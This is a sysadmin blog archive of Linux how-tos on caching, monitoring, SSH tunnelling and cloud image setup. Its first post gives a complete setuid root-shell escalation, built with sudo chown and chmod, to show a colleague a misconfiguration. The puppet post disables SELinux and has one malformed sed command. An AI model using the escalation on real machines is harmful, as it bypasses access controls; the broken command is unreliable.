Archive for the ‘Linux’ Category
My predecessor(s) had left a bunch of people at my workplace (not even developers) with sudo access to chown and chmod – for the purpose of data management. For a while I tried to explain that having sudo access to just those two commands is effectively having full root access on the machines.
I had to demonstrate it. So I did:
cat <<EOF > make-me-root.c
#include <unistd.h>

int main() {
    /* execv() expects a NULL-terminated argv array, not a NULL pointer */
    char *const argv[] = { "/bin/bash", NULL };
    setuid(0);
    execv("/bin/bash", argv);
    return 0;
}
EOF
gcc -o make-me-root make-me-root.c
sudo chown root make-me-root
sudo chmod u+s make-me-root
./make-me-root
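If the machine is set up like that, the shell you just dropped into is a root shell:
# whoami
root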
Alright, demonstrated. Now it’s time for the raised eyebrows to follow.
And now comes the part where I know it’s almost impossible to revoke privileges from people after they’ve got used to a broken workflow.
This is going to be a quick “grocery list” for getting a configuration of Apache -> Squid -> Tomcat going, allowing multiple webapps to be cached at the same time.
The Common Case – Apache & Tomcat
Commonly people would have a configuration of Apache -> Tomcat serving web applications. However, sometimes you would like to add that extra bit of simple caching for a webapp. Sometimes it can really speed things up!!
Assuming you have Tomcat all configured and serving a webapp on http://localhost:8080/webapp, a vhost in Apache would look like:
<VirtualHost *:80>
    ServerName www.webapp.com
    LogLevel info
    ErrorLog /var/log/apache2/www.webapp.com-error.log
    CustomLog /var/log/apache2/www.webapp.com-access.log combined
    ProxyPreserveHost On
    ProxyPass /webapp http://localhost:8080/webapp
    ProxyPassReverse /webapp http://localhost:8080/webapp
    RewriteEngine On
    RewriteOptions inherit
    RewriteLog /var/log/apache2/www.webapp.com-rewrite.log
    RewriteLogLevel 0
</VirtualHost>
Simple! Just forward all /webapp requests to http://localhost:8080/webapp
Squid In The Middle
A simple squid configuration for us would look like:
# some boilerplate configuration for squid
acl manager proto cache_object
acl localhost src 127.0.0.1/32
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32
acl localnet src 10.0.0.0/8
acl localnet src 172.16.0.0/12
acl localnet src 192.168.0.0/16
acl Safe_ports port 80
acl Safe_ports port 443
acl Safe_ports port 8080-8100 # webapps
acl purge method PURGE
acl CONNECT method CONNECT
http_access allow manager localhost
http_access deny manager
http_access allow purge localhost
http_access deny purge
http_access deny !Safe_ports
http_access allow localhost
http_access allow localnet
http_access deny all
icp_access allow localnet
icp_access deny all
http_port 3128
hierarchy_stoplist cgi-bin ?
access_log /var/log/squid/access.log squid
hosts_file /etc/hosts
coredump_dir /var/spool/squid3
# adjust your cache size!
cache_dir ufs /var/cache/squid 20480 16 256
cache_mem 5120 MB
#################################
# interesting part starts here! #
#################################
# adjust this to your liking
maximum_object_size 200 KB
# required to handle same URL with different parameters differently
# so, for instance, the two following URLs are treated as distinct URLs, hence they will
# be cached separately
# http://localhost:8080/webapp/a?param=1
# http://localhost:8080/webapp/a?param=2
strip_query_terms off
# just for some better logging
logformat combined %>a %ui %un [%tl] "%rm %ru HTTP/%rv" %>Hs %<st "%{Referer}>h" "%{User-Agent}>h" %Ss:%Sh
# refresh_pattern is subject to change, but if you decide to cache a webapp, you must make sure it actually gets cached!
# many webapps do not like to get cached, so you can play with all sorts of parameters such as override-expire, ignore-reload
# and ignore-no-cache. the following directive will SURELY cache any page on the following webapp for 1 hour (60 minutes)
# adjust the regexp(s) below to suit your own needs!!
refresh_pattern http://localhost:8080/webapp/.* 60 100% 60 override-expire ignore-reload ignore-no-cache
Now we need to plug Apache into the above Squid configuration. Luckily it’s pretty simple; the only line you need is:
# basically every request going to http://localhost:8080/webapp, pass via squid
ProxyRemote http://localhost:8080/webapp http://localhost:3128
And the whole vhost again:
<VirtualHost *:80>
    ServerName www.webapp.com
    LogLevel info
    ErrorLog /var/log/apache2/www.webapp.com-error.log
    CustomLog /var/log/apache2/www.webapp.com-access.log combined
    ProxyPreserveHost On
    ProxyRemote http://localhost:8080/webapp http://localhost:3128
    ProxyPass /webapp http://localhost:8080/webapp
    ProxyPassReverse /webapp http://localhost:8080/webapp
    RewriteEngine On
    RewriteOptions inherit
    RewriteLog /var/log/apache2/www.webapp.com-rewrite.log
    RewriteLogLevel 0
</VirtualHost>
That’s it. Now look at /var/log/squid/access.log for TCP_MEM_HIT and TCP_HIT entries. If you’re still getting TCP_MISS and the like, you’ll have to adjust your refresh_pattern in the squid configuration.
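A quick way to eyeball how well the cache is doing is to tally the result codes in the access log (a small helper, assuming the log location from the configuration above):
# count squid result codes in the access log
grep -oE 'TCP_[A-Z_]+' /var/log/squid/access.log | sort | uniq -c | sort -rn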
Multiple Webapps?
Not a problem. If you have multiple webapps and you want them cached, just add the magic ProxyRemote line passing them through Squid and the relevant Squid refresh_pattern.
Don’t want a webapp to be cached? Just bypass Squid!
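Here is a sketch of how the relevant vhost lines might look with two hypothetical webapps, where only webapp1 goes through Squid (names and ports are just placeholders – adjust to your setup):
    ProxyPreserveHost On
    # webapp1 is cached - its backend requests go via squid
    ProxyRemote http://localhost:8080/webapp1 http://localhost:3128
    ProxyPass /webapp1 http://localhost:8080/webapp1
    ProxyPassReverse /webapp1 http://localhost:8080/webapp1
    # webapp2 bypasses squid - simply no ProxyRemote line for it
    ProxyPass /webapp2 http://localhost:8080/webapp2
    ProxyPassReverse /webapp2 http://localhost:8080/webapp2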
Recently I was presented with the following situation at work:
- Your input is a handful of directories, filled with files, some of them being a “sort of copy” of the others
- Your output should be one directory with all the files from the source directories merged into it
- The caveat is – if any of the files collide, you must mark them somehow for inspection
Sounds pretty simple, doesn’t it? In my case the input was millions of files. I’m not sure about the exact number; it doesn’t matter. The best solution to this problem is to never get into this situation in the first place, but sometimes you just inherit stuff like that at a new workplace.
The Solution
We needed a ninja. I called it ninja-merge.sh. It is a Bash wrapper for rsync that will merge directories one by one into a destination directory and handle the collisions for you using a checksum function (md5 was “good enough” for that task).
Get ninja-merge.sh here:
https://github.com/danfruehauf/Scripts/tree/master/ninja-merge
It even has unit tests and the works. All that you have to do is specify:
- A list of source directories
- A destination directory
- A directory to store the collisions
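The core idea is roughly the following (a simplified sketch of the approach, not the actual script – grab the real thing from the link above):
#!/bin/bash
# merge source directories into a destination, keeping colliding copies aside
# usage: merge-sketch.sh DST_DIR COLLISION_DIR SRC_DIR [SRC_DIR ...]
main() {
    local dst_dir=$1; shift
    local collision_dir=$1; shift
    local src_dir file
    for src_dir in "$@"; do
        # copy everything that doesn't exist in the destination yet
        rsync -a --ignore-existing "$src_dir/" "$dst_dir/"
        # handle files that already exist in the destination
        while read -r file; do
            local src_file="$src_dir/$file" dst_file="$dst_dir/$file"
            [ -f "$dst_file" ] || continue
            # identical content? nothing to do
            cmp -s "$src_file" "$dst_file" && continue
            # collision - keep both copies, suffixed with their md5 sums
            mkdir -p "$collision_dir/$(dirname "$file")"
            cp "$src_file" "$collision_dir/$file.$(md5sum "$src_file" | cut -d' ' -f1)"
            cp "$dst_file" "$collision_dir/$file.$(md5sum "$dst_file" | cut -d' ' -f1)"
        done < <(cd "$src_dir" && find . -type f | sed 's|^\./||')
    done
}
main "$@"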
If a path collided, you might end up with something like that in your collision directory:
$ cd collision_directory && find . -type f
./a/b/filename1.nc.345c3132699d7524cefe3a161859ebee
./a/b/filename1.nc.259974c1617b40d95c0d29a6dd7b207e
Sorting the collisions is something you’ll have to do manually. Sorry!
Every so often I come across Bash scripts which are written as if Bash is a pile of rubbish and you just have to mould something ugly with it.
True, Bash is supposedly not the most “powerful” scripting language out there, but on the other hand, if you stick to traditional methods, you can avoid installing a gazillion Ruby gems or Perl/Python modules (probably not even packaged as RPM or DEB!!) just to configure your system. Bash is simple and can be elegant. But that’s not the point.
The point is that too often the Bash scripts people write have zero maintainability and readability. Why is that??
I’m not going to point at any bad examples because that’s not a very nice thing to do, although I easily could.
Please do follow these three simple guidelines and you’ll get 90% of the job done in terms of maintainability and readability (a tiny example follows the list):
- Functions – Write code in functions. Break your code into manageable pieces, like any other programming language, ey?
- Avoid global variables – Global variables just make it too complicated to follow what’s going on where. Sometimes they are needed, but you can minimize their use.
- INDENTATION – INDENT YOUR BLOODY CODE. If you have an if or for or what not, please just indent the block under it. It’s that simple and makes your code so much more readable.
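To illustrate all three at once – a trivial, made-up example, nothing more:
#!/bin/bash
# counts files in the given directories - deliberately boring, but structured

# prints the number of files directly under the directory given as $1
count_files() {
    local dir=$1
    find "$dir" -maxdepth 1 -type f | wc -l
}

main() {
    local dir
    for dir in "$@"; do
        echo "$dir: $(count_files "$dir") files"
    done
}

main "$@"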
That was my daily rant.
My Bash coding (or scripting) conventions cover a bit more and can be found here:
https://github.com/danfruehauf/Scripts/tree/master/bash_scripting_conventions
I’ve been searching for a while for a solution to “how to build a fault tolerant Nagios installation” or “how to build a Nagios cluster”. Nada.
The concept is very simple, but the implementation seems to be lacking, so I’ve decided to write a post about how I am doing it.
Cross Site Monitoring
The concept of cross site monitoring is very simple. Say you have nagios01 and nagios02; all that you have to set up is 2 tests:
- nagios01 monitors nagios02
- nagios02 monitors nagios01
Assuming you have puppet or chef managing the show, just make nagios01 and nagios02 (or even more nagiosXX servers) identical, meaning all of them have the same configuration and can monitor all of your systems. Clones of each other, if you’d like to call it that.
Let’s check the common use cases:
- If nagios01 goes down you get an alert from nagios02.
- If nagios02 goes down you get an alert from nagios01.
Great, no wheels reinvented here.
The main problem with this configuration is that if there is a problem (any problem) – you are going to get X alerts, X being the number of nagios servers you have.
Avoiding Duplicate Alerts
For the sake of simplicity, we’ll assume again we have just 2 nagios servers, but this would obviously scale for more.
What we actually want to do is prevent both servers from sending duplicate alerts as they are both configured the same way and will monitor the exact same thing.
One obvious solution is an active/passive type of cluster and all sorts of complicated shenanigans; my solution is simpler than that.
We’ll “chain” nagios02 behind nagios01, making nagios02 fire alerts only if nagios01 is down.
Login to nagios02 and change /etc/nagios/private/resource.cfg, adding the line:
$USER2$="/usr/lib64/nagios/plugins/check_nrpe -H nagios01 -c check_nagios"
$USER2$ will be the condition of whether or not nagios is up on nagios01.
Still on nagios02, edit /etc/nagios/objects/commands.cfg, changing your current alerting command to depend on the condition. Here is an example using the default one:
define command{
    command_name    notify-host-by-email
    command_line    /usr/bin/printf "%b" ...
}
Change to:
define command{
    command_name    notify-host-by-email
    command_line    eval $USER2$ || /usr/bin/printf "%b" ...
}
What we have done here is simply configure nagios02 to query nagios01’s nagios status before firing an alert. Easy as. No more duplicate emails.
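You can test the condition by hand on nagios02 before trusting it (same plugin path and check as configured above):
# exits 0 if nagios01 is healthy, non-zero otherwise -
# which is exactly when nagios02 should start alerting
/usr/lib64/nagios/plugins/check_nrpe -H nagios01 -c check_nagios \
    && echo "nagios01 is alive - nagios02 stays quiet" \
    || echo "nagios01 is down - nagios02 will alert"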
For the sake of robustness, if you would also like to configure nagios01 with a $USER2$ variable, simply log in to nagios01, change the alerting command as on nagios02 and put this in /etc/nagios/private/resource.cfg:
$USER2$="/bin/false"
Assuming you have puppet or chef configuring all that, you can just assign a master ($USER2$=/bin/false) and multiple slaves that query the servers before them in a chain.
For example:
- nagios01 – $USER2$="/bin/false"
- nagios02 – $USER2$="/usr/lib64/nagios/plugins/check_nrpe -H nagios01 -c check_nagios"
- nagios03 – $USER2$="/usr/lib64/nagios/plugins/check_nrpe -H nagios01 -c check_nagios && /usr/lib64/nagios/plugins/check_nrpe -H nagios02 -c check_nagios"
Enjoy!
Say you already have a Nagios system monitoring everything in your environment, and in addition you have a Graylog2 installation which parses logs from everywhere and provides you with invaluable feedback on what’s really going on.
And then comes the problem, or one of them:
- Graylog2 is not really good at sending alerts (or maybe it is?)
- Nagios is already configured to send alerts and you would like to use the same contact groups, for instance
The solution is below.
Design
Before making you read through the whole blog entry, I’ll just outline the solution I’ve chosen to implement and you can decide whether it’s good for you or not. Here it is in a nutshell:
- An alert is generated in Graylog2 on a configured stream
- Graylog2 uses the exec callback plugin to call an external alerting command, call it graylog2-alert.sh for instance
- graylog2-alert.sh pushes an alert using send_nsca
- Nagios parses the alert and notifies whoever is subscribed to that service
Pretty simple and bullet proof.
Graylog2 Configuration
I assume you already have Graylog2 fully configured; in that case, download the wonderful exec callback plugin and place it under the plugin/alarm_callbacks directory (under the Graylog2 directory, obviously).
Log in to Graylog2 and, under Settings->System, enable the Exec alarm callback.
Click configure and point it to /usr/local/sbin/graylog2-alert.sh
That’s it for now on the Graylog2 interface side.
NSCA – Nagios Service Check Acceptor
Properly configure NSCA to work with your nagios configuration. That usually means:
- Opening port 5667 (or another port) on your nagios server
- Choosing a password for symmetrical encryption on the nagios server and the NSCA clients
- Starting the nsca daemon on the nagios server, so it will accept NSCA communications
Generally speaking, configuring NSCA is out of the scope of this article; more information can be found here:
http://www.nsclient.org/nscp/wiki/doc/usage/nagios/nsca
That said, I’ll just mention that when everything works, you should be able to successfully run:
echo "HOSTNAME;SERVICE;2;Critical" | send_nsca -d ';' -H NAGIOS_HOSTNAME
graylog2-alert.sh
On the Graylog2 host, place the following file under /usr/local/sbin/graylog2-alert.sh:
#!/bin/bash
# nagios servers to notify
NAGIOS_SERVERS="NAGIOS_SERVER_1 NAGIOS_SERVER_2 NAGIOS_SERVER_3"
# add a link to the nagios message, so it's easy to access the interface
# on your mobile device once you get an alert
GL2_LINK="http://GRAYLOG_URL/streams"
main() {
    local tmp_file=`mktemp`
    # extract the stream name - the part of $GL2_TOPIC between the square brackets
    local gl2_topic=`echo "$GL2_TOPIC" | cut -d'[' -f2 | cut -d']' -f1`
    echo "`hostname`;Graylog2-$gl2_topic;2;$GL2_LINK $GL2_DESCRIPTION" > $tmp_file
    local nagios_server
    for nagios_server in $NAGIOS_SERVERS; do
        /usr/sbin/send_nsca -d ';' -H $nagios_server < $tmp_file
    done
    rm -f $tmp_file
}
main "$@"
This, in combination with what we did before, will fire alerts from Graylog2 -> exec callback plugin -> graylog2-alert.sh -> NSCA -> nagios server.
The nagios side
All you have left to do now is define services for the Graylog2 alerts. It is a rather straightforward service configuration for nagios; here is mine (generated by puppet, in case you wonder):
define service {
    service_description      Graylog2-STREAM_NAME
    host_name                REPLACE_WITH_YOUR_GRAYLOG2_HOST
    use                      generic-service
    passive_checks_enabled   1
    max_check_attempts       1
    # enable active checks only to reset the alarm
    active_checks_enabled    1
    check_command            check_tcp!22
    normal_check_interval    10
    notification_interval    10
    # set the contact group
    contact_groups           Graylog2-STREAM_NAME
    flap_detection_enabled   0
}
define contactgroup{
    contactgroup_name        Graylog2-STREAM_NAME
    alias                    Graylog2-STREAM_NAME
    members                  dan
}
We usually have a contact group per Graylog2 stream. We just associate developers with the topic that’s relevant to them.
Restart your nagios and you’re set. Don’t forget to also start nsca!!
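On an EL-style box that boils down to something like this (adjust service names to your distribution):
# pick up the new service/contactgroup definitions
service nagios restart
# make sure the NSCA daemon runs now and after reboots
service nsca start
chkconfig nsca on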
Resetting the alert
Graylog2 and NSCA will never generate “positive” OK alerts, only critical ones, so you need a mechanism to reset the alert every once in a while. If you scroll up you’ll see that the active check simply tests port 22 (SSH) on the Graylog2 host.
How often you ask?
When configuring a new stream in Graylog2, it is best to match the Grace period in Graylog2 to the normal_check_interval in nagios, which guarantees the alert will be reset before a new one comes in.
Puppet
The whole shenanigan is obviously puppetized in our environment. Tailoring nagios is usually very different between environments, so I’ve decided it would be rather redundant to paste the puppet recipes here.
I hope you can find this semi-tutorial helpful.
Since I got this question from way too many people, I wanted to just share my “cross distribution” and “cross desktop environment” way of doing that very simple thing of enabling a Hebrew keyboard layout under Linux.
Easy As
After logging into your desktop environment, type this:
setxkbmap -option grp:switch,grp:alt_shift_toggle,grp_led:scroll us,il
Alt+Shift will get you between Hebrew and English. Easy as.
Sustainability
Making it permanent is just as easy:
mkdir -p ~/.config/autostart && cat <<EOF > ~/.config/autostart/hebrew.desktop
[Desktop Entry]
Type=Application
Encoding=UTF-8
Name=Hebrew
Comment=Enable a Hebrew keyboard layout
Exec=setxkbmap -option grp:switch,grp:alt_shift_toggle,grp_led:scroll us,il
EOF
This should survive logout/login, reboots, reinstalls (as long as you keep /home on a separate partition), distribution changes and switching to a different desktop environment (KDE, GNOME, LXDE, etc.).
I personally have numerous hosts which I sometimes have to SSH to. It can get rather confusing and inefficient if you get lost among them.
I’m going to show you here how you can get your SSHing to be heaps more efficient with just 5 minutes of your time.
.ssh/config
In $HOME/.ssh/config I usually store all my hosts like this:
Host host1
    Port 1234
    User root
    HostName host1.potentially.very.long.domain.name.com

Host host2
    Port 5678
    User root
    HostName host2.potentially.very.long.domain.name.com

Host host3
    Port 9012
    User root
    HostName host3.potentially.very.long.domain.name.com
You obviously got the idea. So if I’d like to ssh to host2, all I have to do is:
ssh host2
That will ssh to root@host2.potentially.very.long.domain.name.com:5678 – saves a bit of time.
I usually manage all of my hosts in that file. It makes life simpler; you can even keep it in git if you feel like it…
Auto complete
I’ve added to my .bashrc the following:
_ssh_hosts() {
    local cur="${COMP_WORDS[COMP_CWORD]}"
    COMPREPLY=()
    local ssh_hosts=`grep ^Host ~/.ssh/config | cut -d' ' -f2 | xargs`
    [[ ! ${cur} == -* ]] && COMPREPLY=( $(compgen -W "${ssh_hosts}" -- ${cur}) )
}
complete -o bashdefault -o default -o nospace -F _ssh_hosts ssh 2>/dev/null \
|| complete -o default -o nospace -F _ssh_hosts ssh
complete -o bashdefault -o default -o nospace -F _ssh_hosts scp 2>/dev/null \
|| complete -o default -o nospace -F _ssh_hosts scp
Sweet. All that you have to do now is:
$ ssh TAB TAB
host1 host2 host3
We are a bit more efficient today.
SSH is amazing
Show me one unix machine today without SSH. It’s everywhere, for a reason.
OpenSSH specifically allows you to do so much with it. What would we have done without SSH?
OpenSSH Tunnelling and full VPN
Tunnelling with SSH is really cool; utilizing the secure SSH connection, you can secure virtually any TCP/IP connection using port forwarding (-R and -L):
http://www.openssh.org/faq.html#2.11
However, for full VPN support you can use -w, which opens a tun/tap device on both ends of the connection, potentially allowing all of your network traffic to pass via the SSH connection. In other words – full VPN support for free!!!
Server configuration
On the server, the configuration would be minimal:
- Allow tunnelling in sshd configuration
echo 'PermitTunnel=yes' >> /etc/ssh/sshd_config
service sshd reload
- Allow forwarding and NAT:
iptables -I FORWARD -i tun+ -j ACCEPT
iptables -I FORWARD -o tun+ -j ACCEPT
iptables -I INPUT -i tun+ -j ACCEPT
iptables -t nat -I POSTROUTING -o EXTERNAL_INTERFACE -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
That’s all!! Congratulations on your new VPN server!!
Client configuration (your personal linux machine)
These 2 commands will configure you with a very simple VPN (run as root!!!):
ssh -f -v -o Tunnel=point-to-point \
-o ServerAliveInterval=10 \
-o TCPKeepAlive=yes \
-w 100:100 root@YOUR_SSH_SERVER \
'/sbin/ifconfig tun100 172.16.40.1 netmask 255.255.255.252 pointopoint 172.16.40.2' && \
/sbin/ifconfig tun100 172.16.40.2 netmask 255.255.255.252 pointopoint 172.16.40.1
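To actually push traffic through the tunnel you still need routes on the client. For example, to reach a hypothetical remote network 10.1.2.0/24 that sits behind the server (adjust the network to your own setup):
# route the remote network via the server's end of the tunnel
ip route add 10.1.2.0/24 via 172.16.40.1 dev tun100
# quick sanity check - ping the server's tunnel address
ping -c 3 172.16.40.1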
The only downside of this awesome VPN is that you have to be root on both ends.
But this whole setup is rather clumsy; let’s use some UI for that, no?
NetworkManager-ssh
Somewhere in time, after working intensively in a company dealing with VPNs (but no SSH VPNs at all), I was looking at NetworkManager in my taskbar and thinking “Hey! There’s an OpenVPN, PPTP and IPSEC plugin for NetworkManager, why not build an SSH VPN plugin?”
And hell, why not?
I started searching the Internet frantically, believing that someone had already implemented that ingenious idea (as happens with most good ideas), but except for one mailing list post from a few years ago where someone suggested implementing it – nada.
Guess it’s my prime time. Within a week of forking the code of NetworkManager-openvpn (the NetworkManager OpenVPN plugin) I managed to get something that actually works (ssh-agent authentication only). I was surprised, because I had never dealt with the glib/gtk infrastructure, not to mention UI programming (I’m a pure backend/infrastructure developer for the most part).
And today?
I’m writing this post perhaps 2 months after I started development and committed my first alpha release. While writing this post I’m trying to submit NetworkManager-ssh to fedora (fedora-extras to be precise).
Getting into the bits and bytes behind it is redundant; all you have to know is that the source is available here:
https://github.com/danfruehauf/NetworkManager-ssh
It compiles easily into an RPM or DEB for your convenience. I urge you to give it a shot, and please open issues on GitHub if you find any.
Cloud computing and being lazy
The need to create template images in our cloud environment is obvious, especially with Amazon EC2 offering an amazing API and spot instances at ridiculously low prices.
In the following post I’ll show what I am doing in order to prepare a “puppet-ready” image.
Puppet to the rescue
In my environment I have puppet configured and provisioning all of my machines. With puppet I can deploy anything I need – “if it’s not in puppet, it doesn’t exist”.
Coupled with Puppet dashboard the interface is rather simple for manually adding nodes. But doing stuff manually is slow. I assume that given the right base image I (and you) can deploy and configure that machine with puppet.
In other words, the ability to convert a bare machine to a usable machine is taken for granted (although it is heaps of work on its own).
Handling the “bare” image
Most cloud computing providers today give you an interface for starting/stopping/provisioning machines on their cloud.
The images the cloud providers usually supply are bare – say, CentOS 6.3 with nothing on it. Configuring an image like that requires some manual labour, as you can’t even log in to it automatically without some random password or similar.
Create a “puppet ready” image
So if I boot up a simple CentOS 6.x image, these are the steps I’m taking in order to configure it to be “puppet ready” (and I’ll do it only once per cloud computing provider):
# install EPEL, because it's really useful
rpm -q epel-release-6-8 || rpm -Uvh http://download.fedoraproject.org/pub/epel/6/`uname -i`/epel-release-6-8.noarch.rpm
# install puppet labs repository
rpm -q puppetlabs-release-6-6 || rpm -ivh http://yum.puppetlabs.com/el/6/products/i386/puppetlabs-release-6-6.noarch.rpm
# i usually disable selinux, because it's mostly a pain
setenforce 0
sed -i -e 's!^SELINUX=.*!SELINUX=disabled!' /etc/selinux/config
# install puppet
yum -y install puppet
# basic puppet configuration
echo '[agent]' > /etc/puppet/puppet.conf
echo ' pluginsync = true' >> /etc/puppet/puppet.conf
echo ' report = true' >> /etc/puppet/puppet.conf
echo ' server = YOUR_PUPPETMASTER_ADDRESS' >> /etc/puppet/puppet.conf
echo ' rundir = /var/run/puppet' >> /etc/puppet/puppet.conf
# run an update
yum update -y
# highly recommended is to install any package you might deploy later on
# the reason behind it is that it will save a lot of precious time if you
# install 'httpd' just once, instead of 300 times, if you deploy 300 machines
# also recommended is to run any 'baseline' configuration you have for your nodes here
# such as changing SSH port or applying common firewall configuration for instance
yum install -y MANY_PACKAGES_YOU_MIGHT_USE
# and now comes the cleanup phase, where we actually make the machine "bare", removing
# any identity it could have
# set machine hostname to 'changeme'
hostname changeme
sed -i -e "s/^HOSTNAME=.*/HOSTNAME=changeme" /etc/sysconfig/network
# remove puppet generated certificates (they should be recreated)
rm -rf /etc/puppet/ssl
# stop puppet, as you should change the hostname before it will be permitted to run again
service puppet stop; chkconfig puppet off
# remove SSH keys - they should be recreated with the new machine identity
rm -f /etc/ssh/ssh_host_*
# finally add your key to authorized_keys
mkdir -p /root/.ssh; echo "YOUR_SSH_PUBLIC_KEY" > /root/.ssh/authorized_keys
Power off the machine and create an image. This is your “puppet-ready” image.
Using the image
Now you’re good to go: any machine you create in the future should be based on that image.
When creating a new machine the steps you should follow are:
- Start the machine with the “puppet-ready” image
- Set the machine’s hostname
hostname=uga.bait.com
hostname $hostname
sed -i -e "s/^HOSTNAME=.*/HOSTNAME=$hostname/" /etc/sysconfig/network
- Run ‘puppet agent --test’ to generate a new certificate request
- Add the puppet configuration for the machine; for puppet dashboard it’ll be something similar to:
hostname=uga.bait.com
sudo -u puppet-dashboard RAILS_ENV=production rake -f /usr/share/puppet-dashboard/Rakefile node:add name=$hostname
sudo -u puppet-dashboard RAILS_ENV=production rake -f /usr/share/puppet-dashboard/Rakefile node:groups name=$hostname groups=group1,group2
sudo -u puppet-dashboard RAILS_ENV=production rake -f /usr/share/puppet-dashboard/Rakefile node:parameters name=$hostname parameters=parameter1=value1,parameter2=value2
- Authorize the machine in the puppetmaster (if autosign is disabled)
- Run puppet:
# initial run, might actually change stuff
puppet agent --test
service puppet start; chkconfig puppet on
This is 90% of the work if you want to quickly create usable machines on the fly; it shortens the process significantly and can easily be implemented to support virtually any cloud computing provider!
I personally have it all scripted and a new instance on EC2 takes me 2-3 minutes to load + configure. It even notifies me politely via email when it’s done.
I’m such a lazy bastard.